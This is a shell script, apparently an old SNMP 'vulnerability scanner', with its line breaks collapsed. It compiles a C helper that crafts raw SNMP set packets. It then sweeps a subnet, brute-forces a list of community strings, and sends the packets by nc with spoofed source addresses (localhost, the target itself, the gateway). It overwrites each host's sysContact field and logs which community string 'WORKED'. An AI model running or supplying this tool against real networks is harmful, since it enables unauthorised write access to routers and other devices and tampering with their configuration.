#!/bin/sh rm -f .walk.tmp* /tmp/spoof-* WYSZLO &>/dev/null echo "snmpd vulnerability scanner by " echo x=$1 PRE=$2 if [ "$2" = "" ]; then echo "Usage: $0 start_at c_subnet" echo "example: '$0 0 172.16.1' will scan 172.16.1.0-255." echo exit fi SPFILE="/tmp/spoof-$$" cat >$SPFILE.c <<_EOF_ char buf[1000]; char part1[]="0\202\0-\2\1\0\4"; char part2[]="\243\37\2\1\1\2\1\0\2\1\0000\0240\202\0\20\6\10+\6\1\2\1\1\4\0\4\4null"; main(int argc,char**argv) { char x=strlen(argv[1]); memcpy(buf,part1,sizeof(part1)-1); memcpy(buf+sizeof(part1)-1,&x,1); strcpy(buf+sizeof(part1),argv[1]); memcpy(buf+sizeof(part1)+x,part2,sizeof(part2)-1); write(1,buf,x+1+sizeof(part1)+sizeof(part2)); } _EOF_ echo "Compiling helper application..." gcc -o $SPFILE $SPFILE.c test -x $SPFILE || exit echo "Scan range: $PRE.$x-255..." if [ "$1" = "0" ]; then echo "* Collecting routing information (6 seconds)..." /usr/sbin/traceroute -n -f 3 -w 60 $PRE.32 2>/dev/null >.walk.tmp & sleep 6 killall traceroute &>/dev/null awk '{print $2}' .walk.tmp >.walk.tmp2 fi echo "Starting scan. Outfile is: WYSZLO" while [ "$x" -lt "256" ]; do echo $PRE.$x >>.walk.tmp2 let x=x+1 done COMMUNITIES="public private write all monitor agent manager OrigEquipMfr admin default password tivoli openview community snmp snmpd system" for i in `cat .walk.tmp2`; do echo -n "$i: " snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp ERR="`grep -c -iE 'refuse|error|timeout|fail|denied|found|acce' .walk.tmp`" if [ "$ERR" = "0" ]; then echo "OK" echo -n " system: " awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2 SYS="`cat .walk.tmp2`" echo "$SYS" snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2 SYSNAME="`awk '{print $1}' .walk.tmp2`" echo "$i ($SYS):" >>WYSZLO for j in $COMMUNITIES 'all private' 'Secret C0de' $SYSNAME; do echo -n " $j> " $SPFILE "$j" | nc -u $i 161 &>/dev/null & $SPFILE "$j" | nc -s 127.0.0.1 -u $i 161 &>/dev/null & $SPFILE "$j" | nc -s $i -u $i 161 &>/dev/null & $SPFILE "$j" | nc -s $PRE.1 -u $i 161 &>/dev/null & sleep 1 killall nc &>/dev/null snmpget -R 2 $i public system.sysContact.0 &>.walk.tmp WORKED="`grep -c null .walk.tmp 2>/dev/null`" if [ "$WORKED" = "0" ]; then echo " - $j failed." >>WYSZLO echo "failed." else echo "OK" echo " - $j WORKED." >>WYSZLO break fi done else echo "milczy..." fi done echo "Done." rm -f .walk.tmp* $SPFILE*